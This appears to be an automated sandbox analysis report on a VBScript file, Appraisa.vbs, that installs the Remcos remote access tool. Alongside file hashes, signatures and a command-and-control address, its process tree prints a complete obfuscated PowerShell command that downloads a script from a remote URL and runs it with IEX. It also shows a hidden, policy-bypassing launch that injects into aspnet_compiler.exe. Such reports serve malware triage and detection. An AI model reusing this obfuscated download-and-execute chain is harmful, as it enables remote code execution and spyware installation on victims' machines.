Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
21-04-2021 14:40
General
-
Target
Appraisa.vbs
-
Size
662B
-
MD5
2e95d045ff86903502b52f5fd0976aad
-
SHA1
c74e479ff249f1e8c248b8a67e318a61b1f1d5e4
-
SHA256
dae93e987a854255ff55ce9f62729f17f57d3f8a56933a57cb8de89b698e81f0
-
SHA512
0427fa613d91d41c98dfb7d9a964c74857813959f427eb060a1a39c2cf289235aaa0aec6015cea8d7bd16da1e14bae3ba88c998780d33ea6faf9d0b8102264df
Malware Config
Extracted
remcos
194.5.97.183:8888
Signatures
-
Remcos
Remcos is a closed-source remote control and surveillance software.
-
Blocklisted process makes network request 3 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 16 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Appraisa.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $v0 ='N#t.@@#b'.Replace('#','e').Replace('@@','w');$v00 = '%li!!'.Replace('%','C').Replace('!!','ent');$V000 = 'D$$$$$$$$$$$n%%%%%%%%%%%%ng'.Replace('%%%%%%%%%%%%','loadStri').Replace('$$$$$$$$$$$','ow');$v1 = '$e^'.replace('$','I').replace('^','x');$v9999 = '(Ne`W&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&00(''https://ia601509.us.archive.org/35/items/all_20210420_20210420_1440/ALL.TXT'')'.Replace('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&','-O`BjEcT $v0$v00 ).$V0');$TC=I`E`X ($v9999 -Join '')|I`E`X2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -noexit -exec bypass -file "C:\Users\Public\ Microsoft.ps1"3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"4⤵
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Public\ Microsoft.ps1MD5
eda0264cc0baa7804ce2a32a99aa9b98
SHA1274b4d04e802370cac624649ea30149dded4e053
SHA256950cc79c3173d2a1ad76a7b8e64c9100ca929caf0201396758380ff2d712680f
SHA51243f6dd07e297c157f54147aa34512b4812f2650f990865c81181e14d379bf12352fcc3c2d20fbfb535d8bf2a3b5ebc7ab6aa0cd47ab498f0d1f5818e41bf9a74
-
memory/632-114-0x0000000000000000-mapping.dmp
-
memory/632-120-0x0000020C6EED0000-0x0000020C6EED1000-memory.dmpFilesize
4KB
-
memory/632-123-0x0000020C6FA30000-0x0000020C6FA31000-memory.dmpFilesize
4KB
-
memory/632-124-0x0000020C6EF90000-0x0000020C6EF92000-memory.dmpFilesize
8KB
-
memory/632-125-0x0000020C6EF93000-0x0000020C6EF95000-memory.dmpFilesize
8KB
-
memory/632-130-0x0000020C6EF96000-0x0000020C6EF98000-memory.dmpFilesize
8KB
-
memory/1864-145-0x000002099A983000-0x000002099A985000-memory.dmpFilesize
8KB
-
memory/1864-144-0x000002099A980000-0x000002099A982000-memory.dmpFilesize
8KB
-
memory/1864-160-0x000002099B500000-0x000002099B501000-memory.dmpFilesize
4KB
-
memory/1864-135-0x0000000000000000-mapping.dmp
-
memory/1864-177-0x000002099B4B0000-0x000002099B4C8000-memory.dmpFilesize
96KB
-
memory/1864-184-0x000002099A986000-0x000002099A988000-memory.dmpFilesize
8KB
-
memory/2904-182-0x0000000000400000-0x0000000000478000-memory.dmpFilesize
480KB
-
memory/2904-183-0x000000000042EEEF-mapping.dmp
-
memory/2904-188-0x0000000000400000-0x0000000000478000-memory.dmpFilesize
480KB